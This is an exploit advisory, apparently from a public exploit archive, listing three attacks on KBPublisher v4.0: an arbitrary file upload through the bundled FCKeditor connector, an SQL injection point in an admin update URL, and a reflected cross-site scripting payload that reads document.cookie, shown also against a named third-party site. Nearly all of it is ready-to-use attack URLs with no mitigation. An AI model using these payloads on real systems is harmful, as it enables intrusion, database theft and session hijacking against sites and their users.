facebook facebook twitter rss

KBPublisher v4.0 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 07-06-2012
KBPublisher v4.0  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.kbpublisher.com/
.:. Tested On Demo : http://demo.kbpublisher.com/kb/admin
#######################################################################

===[ Exploit ]===


Remote Arbitrary File Upload
=============================

http://SITE/admin/tools/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://SITE/admin/tools/FCKeditor/editor/filemanager/connectors/php/connector.php

Your File:
http://SITE/images/image/


Sql Injection
==============

http://SITE/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191[sql]


Reflected Xss
==============


https://SITE/?&sid="><script>alert(document.cookie)</script>

Example:

https://wfsm.webfarm.co.nz/kb/?&sid="><script>alert(document.cookie)</script>


#######################################################################

Like us on Facebook :